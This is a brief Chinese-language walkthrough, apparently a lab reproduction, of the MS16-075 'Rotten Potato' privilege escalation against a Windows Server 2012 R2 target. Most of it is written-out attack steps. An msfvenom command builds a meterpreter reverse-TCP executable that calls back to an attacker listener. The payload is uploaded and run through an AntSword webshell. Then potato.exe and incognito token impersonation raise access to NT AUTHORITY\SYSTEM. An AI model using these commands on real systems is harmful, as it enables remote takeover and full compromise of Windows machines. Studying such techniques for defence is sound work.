MS16-075(烂土豆)
烂土豆提取
所谓的烂土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别
复现
上线webshell靶机为windows server 2012 r2
使用msf生成木马,利用蚁剑上传至靶机
生成木马shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.128 LPORT=4444 -f exe > shell.exe
msf设置监听,利用蚁剑执行shell.exe
执行成功,查看当前权限,为Administrator
将potato.exe上传
开始提权
执行potato.exeexecute -cH -f ./potato.exe
利用模块use incognito
列出令牌list_tokens -u
令牌窃取impersonate_token "NT AUTHORITY\\SYSTEM"
提权成功
